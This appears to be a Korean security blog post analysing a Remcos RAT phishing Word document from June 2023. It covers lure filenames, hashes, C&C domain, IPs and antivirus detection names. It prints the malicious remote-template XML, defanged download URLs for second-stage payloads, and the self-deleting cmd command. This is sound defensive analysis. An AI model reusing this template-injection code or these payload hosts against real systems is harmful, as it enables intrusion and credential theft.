이메일로 유포 되는 Remcos RAT 악성코드-RO10098.docx.doc(2023.6.8)

오늘은 이메일로 유포되는 Remcos RAT(렘코스) 악성코드에 대해 알아보겠습니다. 일단 한국 국내를 타켓팅 하고 있다고 말하기는 그렇지만 예를 들어서 다음과 같은 이름으로 유포가 된 적이 있었습니다. 일단 APT 33 이란 정부의 지원을 받는 것으로 알려진 APT 그룹입니다.
\발주서(lkp-2010-024)\po.exe
\발주서(lkp-2020-027)(lkp-2020-027).exe
\요청자료목록(lkp-2020-027).exe
견적서 – ACE international 2.exe
첨부문서.exe
20co08301 – 첨부문서.exe
Advanced Pacific Trading – purchase order list.exe
DHL-Shipping_Documents0010201.exe
KONTEC QUOTE B1018530.exe
뭐~이런 식으로 유포하다 보니 사용자로서는 속기 쉬운 것이 있습니다.
키로깅, 화면 캡처,웹캠,마이크 제어뿐만 아니라 설치된 시스템에 존재하는 웹 브라우저의 히스토리 및 비밀번호 추출 기능 하는 기능도 있습니다. 일단 해쉬값은 다음과 같습니다.

RO10098.docx.doc 악성코드 실행 화면

파일명:RO10098.docx.doc
사이즈:292 KB
CRC32:e0e5d807
MD5:473b3909e911de8c27ab621986c02d0e
SHA-1:bd0366e2416de0fa75b77414b82f31e7ede37255
SHA-256:5564cb2776b7336df157a5d8133543aa7a55c59550d9c8095f660e9945f4d93f

워드 속에 포함이 된 악성코드 관련 코드

악성코드에 포함된 코드는 다음과 같습니다.

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats(.)org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats(.)org/officeDocument/2006/relationships/attachedTemplate"
Target="https://SFKSDKEKSDFIWFIIDFUGUI(D)GIEHJGHDFJHGJEUGHHDFJJXVMDGHJDFGJHERHUDHGFJDFGJ@come(.)to/vyo5py9s"
TargetMode="External"/></Relationships>

입니다.
일단 악성코드는 eqnedt32.exe 이라는 정상적인 파일인 마이크로소프트 오피스 에 있는 수학적인 방정식을 작성하고 편집하기 위한 도구인 Microsoft Equation Editor의 실행 파일을 이용해서 악성코드가 실행됩니다.
일단 2023.06.22 시점에서는 영업 종료되었으며 2023.06.08 기준으로 다음과 같이 동작을 합니다.

Fiddler 로 트래픽

http://45.83.140(.)48/fb/fbfbfb(f)bfbfbfbfbfbfbf(b)f(b)
ffbf####################fbfbfbfbfb(.)doc

그리고 나서 다음과 같은 파일을 다운로드 합니다.
cleanmgrr.exe 을 다운로드 하고 다음과 같이 동작을 합니다.

C:\Users\Public\cleanmgrr.exe
YY.exe 그리고 다운로드가 되며 다음과 같이 동작을 합니다.
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\YY.exe 
여기서 cleanmgrr.exe가 실행되면 CMD 가 실행이 되고 다음과 같은 명령어가 실행됩니다.
C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 1 & Del C:\Users\Public\cleanmgrr.exe
를 통해서 사용자에게 Y 를 선택하도록 하고 나서 1초 동안 대기한 뒤 C:\Users\Public\cleanmgrr.exe 파일을 삭제를 진행합니다.
choice /C Y /N /D Y /T 1 를 통해서 
Y이라는 선택지를 제시하고 Y를 기본 선택 값으로 설정하여 1초 동안 대기
사용자가 키보드에서 다른 키를 누르거나 1초가 지나면 다음 명령어가 실행
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe 명령어를 실행합니다.
즉 다음과 같이 동작을 합니다.

http://45.83.140(.)48/420/cleanmgr.exe
http://84.54.50(.)31/D/YY.exe

C&C와 함께 Remcos RAT 삭제

pekonomiana.duckdns(.)org

그럼 해당 워드 파일을 실행을 다음과 같은 IP 트래픽을 사용을 합니다.

104.16.122(.)175:443(TCP)
104.26.6(.)49:443(TCP)
104.26.7(.)49:443(TCP)
134.19.179(.)211:30491(TCP)
142.250.186(.)35:443(TCP)
172.67.68(.)84:443(TCP)
178.237.33(.)50:80(TCP)
45.83.140(.)48:80(TCP)
52.109.76(.)141:443(TCP)
8.238.22(.)126:80(TCP)
84.54.50(.)31:80(TCP)

그러며 다음과 같은 사이트 접속이 되는 것을 확인을 할수가 있습니다.

come(.)to
pekonomiana.duckdns(.)org

2023-06-20 17:59:49 UTC 기준 바이러스토탈에서 탐지하는 보안 업체들은 다음과 같습니다.
ALYac:Trojan.Downloader.DOC.Gen
Antiy-AVL:Trojan/MSOffice.Embed.tempurl
Arcabit:Trojan.Generic.D404EBC2
Avast:Other:Malware-gen [Trj]
AVG:Other:Malware-gen [Trj]
Avira (no cloud):W97M/Dldr.Agent.ykqza
BitDefender:Trojan.GenericKD.67431362
Cynet:Malicious (score: 99)
DrWeb:W97M.DownLoader.5998
Emsisoft:Trojan.GenericKD.67431362 (B)
eScan:Trojan.GenericKD.67431362
ESET-NOD32:DOC/TrojanDownloader.Agent.ARJ
F-Secure:Malware.W97M/Dldr.Agent.ykqza
GData:Trojan.GenericKD.67431362
Google:Detected
Gridinsoft (no cloud):Trojan.U.Remcos.bot
Ikarus:Trojan-Downloader.Office.Doc
Kaspersky:HEUR:Trojan-Downloader.MSOffice.SLoad.gen
Lionic:Trojan.MSWord.SLoad.4!c
MAX:Malware (ai Score=81)
McAfee-GW-Edition:Artemis!Trojan
Microsoft:Exploit:O97M/CVE-2017-0199.KR!MTB
NANO-Antivirus:Exploit.Xml.CVE-2017-0199.equmby
Rising:Exploit.ExtLink/OFFICE!1.DD7A (CLASSIC)
Symantec:Trojan.Gen.NPE
Tencent:Trojan.Win32.Office_Dl.12461019
Trellix (FireEye):Trojan.GenericKD.67431362
VIPRE:Trojan.GenericKD.67431362
VirIT:W97M.Dwnldr.XK
Xcitium:Malware@#1x9n73ayhpp46
ZoneAlarm by Check Point:HEUR:Trojan-Downloader.MSOffice.SLoad.gen
Zoner:Probably Heur.W97OleLink
그리고 여기서 자신의 백신프로그램이 없다. 그러면 여기서 악의적인 목적을 가지고 동작을 하는 핵심 파일만 잘 잡고 삭제해버리면 됩니다. 즉 백신프로그램 기본적으로 설치하고 나는 잘 모르겠다. 하면 기본적인 설정을 건들지 않고 사용을 하면 됩니다.